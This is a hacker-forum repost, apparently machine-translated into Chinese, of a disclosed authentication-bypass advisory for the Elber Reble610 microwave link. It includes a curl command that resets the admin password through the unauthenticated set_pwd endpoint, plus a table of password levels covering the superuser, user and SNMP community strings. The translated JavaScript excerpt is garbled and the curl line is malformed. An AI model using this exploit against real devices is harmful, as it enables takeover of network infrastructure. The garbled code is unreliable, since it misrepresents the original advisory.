H

Elber Reble610 M/ODU XPIC IP-ASI-SDH微波链接- 身份验证旁路

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
Elber Reble610 M/ODU XPIC IP-ASI-SDH微波链路旁路
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 0.01修订0
摘要: reble610具有准确的硬件设计,没有
内部电缆和完整的模块化。该单元由基本组成
底盘,带4个可提取的板,可维护和关键
操作,例如频率修改,易于效率。模块化
方法为数字处理模块的开发带来了
(包含调制器,解调器和数据接口)和RF模块
(包含发射器,接收器和通道过滤器)。从RF点
可以看,新的传输电路能够保证大约1瓦
在每个模块方案中,还引入宽带预校正
(取决于频带,最多1GHz)。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass:pwd},
53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5818
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5818.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)
 
后退
顶部